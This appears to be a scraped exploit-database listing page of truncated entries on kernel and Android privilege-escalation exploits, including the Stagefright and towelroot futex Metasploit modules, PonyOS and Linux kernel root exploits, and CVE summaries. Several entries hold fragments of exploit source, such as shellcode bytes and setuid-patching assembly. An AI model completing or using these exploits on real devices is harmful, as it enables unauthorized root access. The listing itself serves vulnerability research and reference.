Android Stagefright MP4 tx3g Integer Overflow Exploit

This Metasploit module exploits a integer overflow vulnerability in the Stagefright Library libstagefright.so. The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5...

Android Stagefright MP4 tx3g Integer Overflow

This module exploits an integer overflow vulnerability in the Stagefright Library libstagefright.so. The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5 compliant browse...

Windows 8.1 kernel exploit—CVE-2 0 1 4-4 1 1 3 vulnerability analysis-vulnerability warning-the black bar safety net

! 1. Case description: 2 0 1 4 years 1 0 month 1 4 day, CrowdStrike and FireEye, two IT companies each publish a blog post, in which are invariably introduced a Windows-based system to the new kernel privilege elevation vulnerability. CrowdStrike, the company mentioned in the article: they are on...

CVE-2016-4997

The compat IPTSOSETREPLACE and IP6TSOSETREPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service memory corruption by leveraging in-container root access to provide a crafted offset value that...

Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine

Exploit for macOS platform in category dos / poc / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=776 IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL IOReturn IOAudioEngineUserClient::closeClient audioDebugIOLog3, "+...

Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=809 Most things in the kernel use 32-bit reference counters, relying on the fact that the memory constraints of real computers make it impossible to create enough references to overflow the counters. There are exceptions for things...

CVE-2016-2069

Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU...

Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overfl

Exploit for multiple platform in category dos / poc / Source: https://code.google.com/p/google-security-research/issues/detail?id=543 NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default ther...

PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit

Exploit for linux platform in category local exploits Exploit Title: PonyOS include include int main struct winsize ws; printf"+ PonyOS = 3.0 ioctl local root exploit\n"; memcpy&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8; ioctl0, TIOCSWINSZ, &ws; ioctl0, TIOCGWINSZ, void 0x0010f101; printf"- patched...

Linux Kernel (PonyOS 3.0) - TTY &#039;ioctl()&#039; Local Privilege Escalation

/ Exploit Title: PonyOS include include int main struct winsize ws; printf"+ PonyOS = 3.0 ioctl local root exploit\n"; memcpy&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8; ioctl0, TIOCSWINSZ, &ws; ioctl0, TIOCGWINSZ, void 0x0010f101; printf"- patched syssetuid\n"; asm"movl $0x18,%eax"; asm"xorl...

CVE-2014-9683

Off-by-one error in the ecryptfsdecodefromfilename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service buffer overflow and system crash or possibly gain privileges via a crafted filename...

Android Futex Requeue Kernel Exploit

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' class Metasploit4 'Android futex requeue...

Android 'Towelroot' Futex Requeue Kernel Exploit

This module exploits a bug in futexrequeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...

Amazon Linux AMI : kernel (ALAS-2014-363)

The futexrequeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEXREQUEUE command that facilitates unsafe waiter modification. C Tenable Network Security, Inc...

Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working)

No description provided by source. / hatorihanzo.c Linux kernel dobrk vma overflow exploit. The bug was found by Paul IhaQueR Starzetz [email protected] Further research and exploit development by Wojciech Purczynski [email protected] and Paul Starzetz. c 2003 Copyright by IhaQueR and cliph. All Rights...

Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation

No description provided by source. / american-sign-language.c Linux Kernel 2.6.37-rc2 ACPI custommethod Privilege Escalation Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 This custommethod file allows to inject...

Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)

No description provided by source. include netinet/in.h include stdio.h include sys/types.h include sys/socket.h include net/if.h include sys/mman.h include linux/net.h define BUFSIZE 0x10000000 int mainint argc, char argv void mem = mmap0, BUFSIZE, PROTREAD | PROTWRITE, MAPANONYMOUS | MAPPRIVATE...

Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit

No description provided by source. / safecentral-unharden-v2.c Copyright c 2009 by [email protected] Authentium SafeCentral = 2.6 shdrv.sys local kernel ring0 SYSTEM exploit by mu-b - Thu 3 Sep 2009 - Tested on: shdrv.sys 2.0.0.146 Compile: MinGW + -lntdll - Private Source Code -DO NOT DISTRIBU...

Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges...

Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit

No description provided by source. / 0x82-CVE-2009-2698 Linux kernel 2.6 2.6.19 32bit ipappenddata local ring0 root exploit Tested White Box 42.6.9-5.ELsmp, CentOS 4.42.6.9-42.ELsmp, CentOS 4.52.6.9-55.ELsmp, Fedora Core 42.6.11-1.1369FC4smp, Fedora Core 52.6.15-1.2054FC5, Fedora Core...